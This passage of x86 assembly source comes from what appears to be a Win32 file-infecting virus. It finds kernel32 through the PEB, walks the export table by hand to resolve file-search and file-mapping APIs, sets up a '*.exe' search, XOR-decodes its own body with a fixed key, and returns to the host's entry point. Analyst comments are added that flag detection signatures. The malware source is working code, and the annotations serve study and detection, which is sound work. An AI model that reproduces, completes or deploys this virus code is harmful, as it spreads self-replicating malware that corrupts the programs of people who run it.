;---------------------
push eax
call [ebp + _CloseHandle]
ret
CloseH endp
GetProcAddress proc
;----------------------------------------------------------------------
; Resolve one kernel32 export by name through the GetProcAddress pointer
; that LoadApis already stored in [ebp + _GetProcAddressA].
; In:    eax = assembled offset of a NUL-terminated export name string
;        ebp = relocation delta (see Relocate)
; Out:   eax = address returned by GetProcAddress
;        On a zero result control leaves via jz toOldEntry instead of
;        ret, so the return address (and the caller's pushad frame when
;        called from LoadApis) stays on the stack.
; Clobb: eax, flags; the callee's own clobbers apply
;----------------------------------------------------------------------
;---------- Arguments
;eax
;----------------
add eax,ebp ; fix the string offset up to its runtime address
push eax ; lpProcName
push dword ptr [ebp + hDll] ; hModule = kernel32 base recorded by LoadApis
call [ebp + _GetProcAddressA]
cmp eax,0
jz toOldEntry ; unresolved export: abandon the routine and go to the host entry
ret
GetProcAddress endp
LoadApis proc ; locate the kernel32.dll image base and load the API function addresses
;----------------------------------------------------------------------
; Finds kernel32's base from the PEB (fs:[30h]), scans its export name
; table by hand for "GetProcAddress", then uses it to fill _ApisList.
; In:    ebp = relocation delta (see Relocate)
; Out:   eax = 0 if no export name matched (nothing else stored)
;        otherwise eax = caller's eax OR 00ff00ffh (non-zero marker)
;        [ebp+hDll], [ebp+IED], [ebp+_GetProcAddressA] and the
;        _ExitProcess .. _GetModuleHandleA slots are written
; Clobb: eax, flags (everything else is restored by popad)
; Analyst note: the fs:[30h] read followed by a manual export-directory
; walk is a recognisable dynamic-API-resolution pattern worth keying on.
;----------------------------------------------------------------------
pushad
xor eax,eax
assume fs: fs
mov eax,FS:[eax + 30h] ; eax = fs:[30h]
test eax,eax
js kernel9x ; sign bit set is taken to mean Win9x; otherwise the NT path below
kernelnt:
mov eax,[eax + 0ch] ; NOTE(review): presumably PEB->Ldr
mov esi,[eax + 1ch] ; presumably the head of a loader module list
lodsd ; eax = following list entry
mov eax,[eax + 08h] ; presumably that entry's DllBase, assumed to be kernel32 (ordering is OS-version dependent)
jmp found
kernel9x:
mov eax,[eax + 34h] ; Win9x-specific structure walk; offsets not documented here
lea eax,[eax + 7ch]
mov eax,[eax + 3ch]
found:
; resolve the address of GetProcAddress
mov [ebp + hDll],eax ; hDll = kernel32 image base
add eax,dword ptr [eax + 3ch] ;eax ->PE header (e_lfanew)
mov eax,dword ptr [eax + 78h] ; RVA of the export directory
add eax,[ebp + hDll] ;eax->IED
mov [ebp + IED],eax
mov ecx,[eax + 14h] ;numberofnames
mov eax,[eax + 20h] ;eax -> NameTable (RVA)
add eax,[ebp + hDll] ; eax -> NameTable (VA)
xor edx,edx ; edx = index of the name being examined
cld
loopGpa: push ecx
mov ecx,0eh ; compare 14 bytes = length of 'GetProcAddress' without its NUL
mov esi,[eax]
add esi,[ebp + hDll] ; esi -> current export name
mov edi,offset szGetProcAddressA
add edi,ebp ; edi -> relocated 'GetProcAddress'
repe cmpsb
cmp ecx,0 ; only the remaining count is consulted here, not ZF from the last compare
jz got
pop ecx
add eax,4 ; next name-table entry
inc edx
loop loopGpa
popad
xor eax,eax ; no match: return 0
ret
got:
pop ecx
mov edi,[ebp + IED]
mov eax,[edi + 24h] ; RVA of NameOrdinals
add eax,[ebp + hDll] ;eax->NameOrdinals
shl edx,1 ; ordinal entries are words
add eax,edx
movzx edx,word ptr [eax] ; edx = ordinal index for this name
shl edx,2 ; function entries are dwords
mov eax,[edi + 1ch] ; RVA of AddrOfFunctions
add eax,[ebp + hDll] ;eax->AddrOfFunctions
mov eax,[eax + edx] ; RVA of the function
add eax,[ebp + hDll]
mov [ebp + _GetProcAddressA],eax ;save GetProcAddressA
GetApis:
; Fill _ApisList in order. Each call uses the GetProcAddress proc above,
; which on a zero result diverts to toOldEntry rather than returning here.
mov eax,offset szExitProcess ;0
call GetProcAddress
mov [ebp + _ExitProcess],eax
mov eax,offset szLoadLibraryA ;1
call GetProcAddress
mov [ebp + _LoadLibraryA],eax
mov eax,offset szGetWindowsDirectoryA ;2
call GetProcAddress
mov [ebp + _GetWindowsDirectoryA],eax
mov eax,offset szGetSystemDirectoryA ;3
call GetProcAddress
mov [ebp + _GetSystemDirectoryA],eax
mov eax,offset szGetCurrentDirectoryA ;4
call GetProcAddress
mov [ebp + _GetCurrentDirectoryA],eax
mov eax,offset szSetCurrentDirectoryA ;5
call GetProcAddress
mov [ebp + _SetCurrentDirectoryA],eax
mov eax,offset szFindFirstFileA ;6
call GetProcAddress
mov [ebp + _FindFirstFileA],eax
mov eax,offset szFindNextFileA ;7
call GetProcAddress
mov [ebp + _FindNextFileA],eax
mov eax,offset szFindClose ;8
call GetProcAddress
mov [ebp + _FindClose],eax
mov eax,offset szCreateFileA ;9
call GetProcAddress
mov [ebp + _CreateFileA],eax
mov eax,offset szCreateFileMapping ;10
call GetProcAddress
mov [ebp + _CreateFileMapping],eax
mov eax,offset szMapViewOfFile ;11
call GetProcAddress
mov [ebp + _MapViewOfFile],eax
mov eax,offset szUnmapViewOfFile ;12
call GetProcAddress
mov [ebp + _UnmapViewOfFile],eax
mov eax,offset szCloseHandle ;13
call GetProcAddress
mov [ebp + _CloseHandle],eax
mov eax,offset szFreeLibrary ;14
call GetProcAddress
mov [ebp + _FreeLibrary],eax
mov eax,offset szGetModuleHandleA ;15
call GetProcAddress
mov [ebp + _GetModuleHandleA],eax
popad ; restores the caller's eax too
or eax,00ff00ffh ; success marker: guaranteed non-zero, unlike the failure path
ret
LoadApis endp
Display: ; stub: falls straight through to the host entry
jmp toOldEntry
toOldEntry: ; jump to the original program entry point
db 0e9h ; hand-encoded near JMP rel32 (opcode E9); also the target of GetProcAddress's failure branch
dd offset rt - offset toOldEntry - 5 ; rel32 = target - address after this 5-byte JMP; as assembled it points at the rt tail of this file (whether it is rewritten elsewhere is not visible in this chunk)
;------------------------------------------
; variables and constants
; All of these are reached as [ebp + label] after Relocate, and they lie
; inside the virse_start..decDataEnd span that Encrypt XOR-transforms.
hDll label dword ; kernel32.dll image base found by LoadApis
dd ?
IED label dword ; VA of kernel32's export directory (set by LoadApis)
dd ?
nCounte label dword ; not referenced in the visible code
dd 0
szUser32 db 'user32.dll' ; no terminating NUL: the string runs straight into szMsg
szMsg db 'Virse run up!!',0 ; analyst note: a convenient string signature for this body
_ApisList label byte ; API function address table; slots are filled by LoadApis in the order listed in szApis
_ExitProcess label dword
dd 0
_GetProcAddressA label dword ; filled by the export-table scan in LoadApis, not via GetProcAddress
dd 0
_LoadLibraryA label dword
dd 0
_GetWindowsDirectoryA label dword
dd 0
_GetSystemDirectoryA label dword
dd 0
_GetCurrentDirectoryA label dword
dd 0
_SetCurrentDirectoryA label dword
dd 0
_FindFirstFileA label dword
dd 0
_FindNextFileA label dword
dd 0
_FindClose label dword
dd 0
_CreateFileA label dword
dd 0
_CreateFileMapping label dword
dd 0
_MapViewOfFile label dword
dd 0
_UnMapViewOfFile label dword ; written as _UnmapViewOfFile in LoadApis; the two names only agree because MASM ignores case by default (no option casemap:none visible here)
dd 0
_CloseHandle label dword
dd 0
_FreeLibrary label dword
dd 0
_MessageBoxA label dword ; not filled by the visible LoadApis
dd 0
_GetModuleHandleA label dword
dd 0
;------------------------------------------
szApis label byte ; export names, each NUL-terminated
szGetProcAddressA db 'GetProcAddress',0 ; 14 characters, matching the 0eh compare length in LoadApis
szExitProcess db 'ExitProcess',0
szLoadLibraryA db 'LoadLibraryA',0
szGetWindowsDirectoryA db 'GetWindowsDirectoryA',0
szGetSystemDirectoryA db 'GetSystemDirectoryA',0
szGetCurrentDirectoryA db 'GetCurrentDirectoryA',0
szSetCurrentDirectoryA db 'SetCurrentDirectoryA',0
szFindFirstFileA db 'FindFirstFileA',0
szFindNextFileA db 'FindNextFileA',0
szFindClose db 'FindClose',0
szCreateFileA db 'CreateFileA',0
szCreateFileMapping db 'CreateFileMappingA',0
szMapViewOfFile db 'MapViewOfFile',0
szUnmapviewOfFile db 'UnmapViewOfFile',0
szCloseHandle db 'CloseHandle',0
szFreeLibrary db 'FreeLibrary',0
szGetModuleHandleA db 'GetModuleHandleA',0
szMessageBoxA db 'MessageBoxA',0 ; not referenced in the visible code
win32_find_data dd 0 ; laid out field by field to match WIN32_FIND_DATAA: dwFileAttributes
dd 2 dup(0) ; ftCreationTime
dd 2 dup(0) ; ftLastAccessTime
dd 2 dup(0) ; ftLastWriteTime
dwFileSizeHigh dd 0
dwFileSizeLow label dword
dd 0
dd 0 ; dwReserved0
dd 0 ; dwReserved1
cFileName db 260 dup (0) ; MAX_PATH
db 14 dup(0) ; cAlternateFileName
szExe db '*.exe',0 ; search pattern; the FindFirstFileA call site is not in this chunk
hFind label dword ; search handle
dd 0
bufDir label byte ; directory path buffer
db 260 dup(0)
hFile label dword ; file handle
dd 0
hMapFile label dword ; mapping handle
dd 0
ImageBase label dword ; not referenced in the visible code
dd 0
NewEntry label dword ; not referenced in the visible code
dd 0
OldEntry label dword ; not referenced in the visible code
dd 0
isExe label word ; not referenced in the visible code
dw 0
decDataEnd: ; end of the region Encrypt transforms (offset decDataEnd - offset virse_start)
Encrypt proc ; encryption routine
;----------------------------------------------------------------------
; XOR the body from virse_start up to decDataEnd in place with the
; constant 12345678h, one dword at a time. XOR is its own inverse, so
; deccode calls the same routine to decode.
; In:    esi = runtime address of virse_start (start of the region)
; Out:   region rewritten in place; esi and edi advanced past it
; Clobb: eax, ecx, edx, edi, esi, flags
; Requires the region to be writable at run time (self-modifying code);
; how that is arranged is not visible in this chunk.
; Analyst note: the 4-byte key 12345678h and the lodsd/xor/stosd loop
; form a simple, easily recognisable decoder stub.
;----------------------------------------------------------------------
mov edi,esi ; destination = source, so the transform is in place
mov eax,offset decDataEnd - offset virse_start ; region length in bytes
mov ecx,4
xor edx,edx ; edx must be zero before the unsigned div
div ecx ; eax = length / 4 (dword count); any remainder bytes are left untouched
dec ecx ; no effect: ecx is overwritten on the next line
mov ecx,eax ; ecx = number of dwords to process
cld
repxor:
lodsd
xor eax,12345678h
stosd
loop repxor
ret
Encrypt endp
deccode: ; decoder entry: compute the load delta, XOR-decode the body in place, then continue to Prepare (not in this chunk)
call Relocate ; ebp = relocation delta
mov esi,offset virse_start
add esi,ebp ; esi = runtime address of virse_start
call Encrypt ; symmetric XOR, so this decodes
jmp Prepare ; Prepare is defined outside this chunk
Relocate proc
;----------------------------------------------------------------------
; Compute the load delta used by every [ebp + label] reference:
; ebp = runtime address of R - assembled offset of R.
; In:    none
; Out:   ebp = relocation delta
; Clobb: ebp, flags
;----------------------------------------------------------------------
call R ; pushes the runtime address of R
R:
pop ebp ; ebp = runtime address of R
sub ebp,offset R ; subtract its assembled offset
ret
Relocate endp
;------------------------------------------
virse_end: ; end of the body
rt: ; tail reached by toOldEntry's JMP as assembled: terminate rather than return anywhere
push 00000000h ; uExitCode = 0
call [ebp + _ExitProcess]
end start ; start is defined outside this chunk